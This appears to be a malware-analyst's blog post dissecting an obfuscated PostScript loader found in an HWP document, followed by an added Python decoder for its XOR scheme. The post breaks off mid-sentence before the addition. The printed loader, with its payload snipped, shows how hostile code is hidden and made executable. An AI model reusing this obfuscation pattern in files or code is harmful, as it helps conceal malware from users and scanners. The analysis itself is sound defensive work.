Showing posts from April, 2020

Malicious postscript code in hwp

I found an HWP (Hangul Word Processor) file that contains malicious PostScript code. I took some analysis notes for my memo.

The malicious PostScript code is as follows (the long hexadecimal string is snipped):

    /X240 <0632E7CB1D9F2067FDA9197F289976CC…snip…> def %kshvudgsjsye3
    0 1 X240 length 1 sub % %kshvudgsjsye3
    {/Y31 exch 1 2 and pop def %kshvudgsjsye3
     X240 dup Y31 get <296BD6EB2CA90321BBEF5F5F4CFC10EC> Y31 15 and /Y104 8 def get xor Y31 exch put} for
    X240 cvx % exec

I’ve googled and found some coding rules.

・Anything following a % on a PostScript program line is ignored by the interpreter.
・Initialize variable i with value 0:  /i 0 def
・Set each element of array ar to value n:  0 1 ar length 1 sub {ar exch n put} for
・exch: exchange the top two values of the stack.
・dup: duplicate the top element of the stack.
・Logical "and" operator: a&&b is written  a b and
・<hexadecimal string> cvx  makes the string executable
・<hexadecimal string> cvx exec  m
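As an added example (not code from the original post), the following Python emulates the decoding loop above: each byte of X240 is XORed with the 16-byte key indexed by the loop counter masked with 15, exactly as "Y31 15 and ... get xor ... put" does. The key and the visible 16-byte prefix of X240 are copied from the snippet; the remainder of X240 is snipped on the page, so only that prefix is decoded here.

```python
"""Emulate the XOR-decoding loop from the HWP PostScript snippet.

Added example, not from the original post. The key string and the
visible first 16 bytes of X240 are copied from the snippet; everything
after the "...snip..." marker is unknown, so only that prefix is decoded.
"""

# Key string from the snippet: <296BD6EB2CA90321BBEF5F5F4CFC10EC>
KEY = bytes.fromhex("296BD6EB2CA90321BBEF5F5F4CFC10EC")

# Visible prefix of X240 before "...snip..." (16 bytes, from the snippet).
X240_PREFIX = bytes.fromhex("0632E7CB1D9F2067FDA9197F289976CC")


def strip_comments(postscript: str) -> str:
    """Drop everything from '%' to end of line (the '%kshvudgsjsye3' junk).

    Simplification: a '%' inside a parenthesised PostScript string is not
    a comment, but the snippet above contains no such strings.
    """
    return "\n".join(line.split("%", 1)[0].rstrip()
                     for line in postscript.splitlines())


def xor_decode(data: bytes, key: bytes = KEY) -> bytes:
    """Replicate:  0 1 X240 length 1 sub { ... Y31 15 and get xor ... put } for

    For each index i, X240[i] becomes X240[i] xor key[i & 15].
    'Y31 15 and' masks the index to 0..15, so the 16-byte key repeats.
    '1 2 and pop' and '/Y104 8 def' inside the loop body leave the stack
    unchanged (dead code inserted as noise) and are not reproduced.
    """
    if len(key) != 16:
        raise ValueError("'15 and' indexes a 16-byte key; other lengths change the loop")
    return bytes(b ^ key[i & 15] for i, b in enumerate(data))


def decode_prefix() -> bytes:
    """Decode the visible prefix of X240 with the snippet's key."""
    return xor_decode(X240_PREFIX)


if __name__ == "__main__":
    # The 16 visible bytes decode to readable PostScript: a variable definition.
    print(decode_prefix())  # b'/Y1 16#FFFF def '
```

Because XOR is its own inverse, the same function turns decoded PostScript back into the obfuscated form, which is useful for writing test fixtures for a detection rule.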